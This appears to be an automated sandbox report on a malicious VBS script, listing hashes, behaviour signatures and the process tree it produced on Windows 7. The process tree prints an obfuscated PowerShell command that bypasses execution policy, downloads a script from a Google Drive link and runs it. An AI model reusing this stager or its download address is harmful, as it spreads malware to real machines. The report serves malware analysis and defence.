Overview

overview

8

Static

static

1

176c5002a8...b1.vbs

windows7-x64

8

176c5002a8...b1.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    30-12-2023 11:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    176c5002a81808675e9bc0fd08d7c3b1.vbs

  • Size

    720B

  • MD5

    176c5002a81808675e9bc0fd08d7c3b1

  • SHA1

    69d3ad714b0d71da5aad430ce3a25b8e590a1785

  • SHA256

    1ee99a2d1ec0eb38fc56473f1edd0ee266538bdf23e1e515c876c5444626d138

  • SHA512

    6981301a3732b6bcaa3d55b425933f6dc582ce02770b750583fe21ad43b211c3bf51f81588bb7b44d0961d86fea8c22027a82189ab0893acda9a679d5d2c3396

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\176c5002a81808675e9bc0fd08d7c3b1.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:816
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://drive.google.com/uc?export=download&id=1nzTe5O_G-ta5x9i2-rOKn-tvWviha3l8'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2112

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2112-5-0x00000000002F0000-0x00000000002F8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2112-7-0x0000000002BA0000-0x0000000002C20000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2112-10-0x0000000002BA0000-0x0000000002C20000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2112-9-0x0000000002BA0000-0x0000000002C20000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2112-8-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2112-6-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2112-4-0x000000001B750000-0x000000001BA32000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2112-11-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

    Filesize

    9.6MB

    Download